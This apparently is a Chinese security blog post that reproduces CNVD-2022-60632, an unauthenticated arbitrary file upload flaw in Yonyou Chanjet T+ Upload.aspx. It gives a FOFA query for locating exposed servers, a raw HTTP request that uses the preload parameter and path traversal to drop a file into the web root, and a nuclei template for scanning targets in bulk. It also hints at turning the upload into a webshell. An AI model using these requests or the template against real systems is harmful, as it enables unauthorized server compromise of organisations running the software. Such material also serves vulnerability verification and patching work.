用友畅捷通T+ Upload.aspx任意文件上传漏洞CNVD-2022-60632

漏洞描述

用友 畅捷通T+ Upload.aspx接口存在任意文件上传漏洞，攻击者通过 preload 参数绕过身份验证进行文件上传，控制服务器

漏洞影响

用友 畅捷通T+

漏洞复现

fofa语法：app="畅捷通-TPlus"
登录页面如下：

上传文件类型验证不完善，可上传任意文件到服务器中的任意位置，验证POC

POST /tplus/SM/SetupAccount/Upload.aspx?preload=1 HTTP/1.1
Host:
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 261
User-Agent: Mozilla/5.0 (iPod; U; CPU iPhone OS 3_0 like Mac OS X; ko-KR) AppleWebKit/535.16.4 (KHTML, like Gecko) Version/3.0.5 Mobile/8B117 Safari/6535.16.4
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVXR9biLu
Connection: close

------WebKitFormBoundaryVXR9biLu
Content-Disposition: form-data; name="File1";filename="../../../../../../../Program Files (x86)/Chanjet/TPlusStd/WebSite/1.txt"
Content-Type: image/jpeg

1
------WebKitFormBoundaryVXR9biLu--

由于应用为预编译的，直接上传的 aspx木马无法直接利用，需要通过上传 dll 与 compiled文件后利用Webshell
后续利用请自行搜索

nuclei批量yaml文件

id: yonyou_changjietong_upload_rce

info:
  name: yonyou_changjietong_upload_rce
  author: afan
  severity: high
  tags: yonyou,changjietong,bjxsec,yonyouoa
  description: fofa   app="畅捷通-TPlus"
variables:
  file_name: "{{to_lower(rand_text_alpha(8))}}.txt"
  file_content: "{{to_lower(rand_text_alpha(26))}}"
requests:
  - raw:
      - |
        POST /tplus/SM/SetupAccount/Upload.aspx?preload=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 196
        Cache-Control: max-age=0
        Upgrade-Insecure-Requests: 1
        Origin: null
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarysHT4cEvOAWALSZEv
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close

        ------WebKitFormBoundarysHT4cEvOAWALSZEv
        Content-Disposition: form-data; name="File1"; filename="../{{file_name}}"
        Content-Type: image/jpeg

        {{file_content}}
        ------WebKitFormBoundarysHT4cEvOAWALSZEv--
      
      - |
        GET /tplus/SM/SetupAccount/{{file_name}} HTTP/1.1
        Host: {{Hostname}}

    req-condition: true
    matchers:
      - type: word
        words:
          - "{{file_content}}"
        part: body

本栏目推荐文章
• C++实现文件内查找字符串
• IDEA项目名称后面出现中括号，模块Modules的名子和文件夹名称不同，可以右键修改名称也可以在File->Project Structure 修改Modules的Name(快捷键ctrl+Shift+Alt+s)
• 和利时MACS6通过dat文件实现任意时间范围与测点的历史数据提取与科研分析
• OFBiz RCE漏洞复现（CVE-2023-51467）
• 类模板分文件编写
• Linux文件IO之二 [补档-2023-07-21]
• Linux文件IO之一 [补偿-2023-07-21]
• 十行python代码实现文件去重，去除重复文件的脚本
• vim编辑器实现左边目录右边是文件内容
• MakeFile文件的使用 [补档-2023-07-13]

漏洞 文件 Upload 60632 CNVD漏洞 文件60632 cnvd 漏洞 文件upload 60632 漏洞u8-cloud文件upload 漏洞 证书cnvd 漏洞cnvd-c uapjs 76801 漏洞42853 16.5 cnvd 漏洞08743 cnvd 2023 沙箱amp cnvd漏洞 漏洞01084 cnvd 2018 upload-labs漏洞upload平台